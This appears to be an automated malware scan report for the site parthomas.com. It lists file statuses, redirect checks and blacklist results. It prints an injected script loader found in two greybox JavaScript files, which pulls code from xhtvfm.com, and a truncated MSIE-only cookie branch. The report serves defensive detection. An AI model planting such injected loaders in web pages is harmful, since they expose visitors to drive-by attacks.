Scanned pages/files
Request | Server response | Status |
http://parthomas.com/ | 200 OK Content-Length: 8198 Content-Type: text/html | clean |
http://parthomas.com/move.js | 200 OK Content-Length: 3888 Content-Type: application/javascript | suspicious |
Suspicious code found (excerpt; the scanner cut it off at "[…]"): function getCookie(name) { var cookie = " " + document.cookie; var search = " " + name + "="; var setStr = null; var offset = 0; var end = 0; if (cookie.length > 0) { offset = cookie.indexOf(search); if (offset != -1) { offset += search.length; end = cookie.indexOf(";", offset); if (end == -1) { end = cookie.length; } setStr = unescape(cookie.substring(offset, end)); } } return setStr;} if (navigator.userAgent.indexOf("MSIE") != -1){if(navigator.cookieEnabled == true) {var user228 = getCo […] function setCookie(name, value, expiredays, path, domain, secure) { if (expiredays) { var exdate=new Date(); exdate.setDate(exdate.getDate()+expiredays); var expires = exdate.toGMTString(); } document.cookie = name + "=" + escape(value) + ((expiredays) ? "; expires=" + expires : "") + ((path) ? "; path=" + path : "") + ((domain) ? "; domain=" + domain : "") + ((secure) ? "; secure" : "");} Note: getCookie and setCookie are ordinary cookie helpers; the part to review is the branch that runs only when the user agent contains "MSIE" and cookies are enabled, whose body is not shown in this excerpt. | ||
http://parthomas.com/shop.html | 200 OK Content-Length: 6081 Content-Type: text/html | clean |
http://parthomas.com/shop-mariatheresienstrasse.php | 200 OK Content-Length: 13529 Content-Type: text/html | clean |
http://parthomas.com/greybox/AJS.js | 200 OK Content-Length: 20077 Content-Type: application/javascript | suspicious |
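Suspicious code found: /*hbinahbina09460hbina09*/ document.write("<script type='text/javascript' src='http://xhtvfm.com/octaviora/W9jLFdyv.php?id='></"+ "script>"); Note: this statement writes a script tag that loads JavaScript from another host (xhtvfm.com) rather than from parthomas.com. | ||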
http://parthomas.com/greybox/gb_scripts.js | 200 OK Content-Length: 11112 Content-Type: application/javascript | suspicious |
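Suspicious code found: /*hbinahbina09460hbina09*/ document.write("<script type='text/javascript' src='http://xhtvfm.com/octaviora/W9jLFdyv.php?id='></"+ "script>"); Note: this is the same marker comment and the same script loader for xhtvfm.com that the scan reports in greybox/AJS.js. | ||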
http://parthomas.com/index.html | 200 OK Content-Length: 8198 Content-Type: text/html | clean |
http://parthomas.com/journal.html | 200 OK Content-Length: 16194 Content-Type: text/html | clean |
http://parthomas.com/../pressestimmen/Krone-07-12.pdf | 400 Bad Request Content-Length: 305 Content-Type: text/html | clean |
http://parthomas.com/test404page.js | 404 Not Found Content-Length: 291 Content-Type: text/html | clean |
http://parthomas.com/../pressestimmen/20er.jpg | 400 Bad Request Content-Length: 305 Content-Type: text/html | clean |
http://parthomas.com/../pressestimmen/zeit-aut-gsa.pdf | 400 Bad Request Content-Length: 305 Content-Type: text/html | clean |
http://parthomas.com/../pressestimmen/zeit-aut-gsa(2).pdf | 400 Bad Request Content-Length: 305 Content-Type: text/html | clean |
http://parthomas.com/../pressestimmen/augsburger-allgemeine-gsa.pdf | 400 Bad Request Content-Length: 305 Content-Type: text/html | clean |
http://parthomas.com/../pressestimmen/diezeit-gsa.pdf | 400 Bad Request Content-Length: 305 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: parthomas.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 20 Jan 2015 12:55:25 GMT
Accept-Ranges: bytes
ETag: "2302e27-2006-503aedd778ca0"
Server: Apache/2.2.14 (Ubuntu)
Content-Length: 8198
Content-Type: text/html
Last-Modified: Mon, 22 Sep 2014 22:20:58 GMT
X-Pad: avoid browser bug
...8198 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: parthomas.com
Referer: http://www.google.com/search?q=parthomas.com
Result:
The result is similar to the first query; no suspicious redirects were found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=parthomas.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://parthomas.com/
Result: parthomas.com is not infected or malware details are not published yet. (A "not listed" blacklist result does not clear the suspicious scripts reported under "Scanned pages/files"; a site can carry injected code before any blacklist lists it.)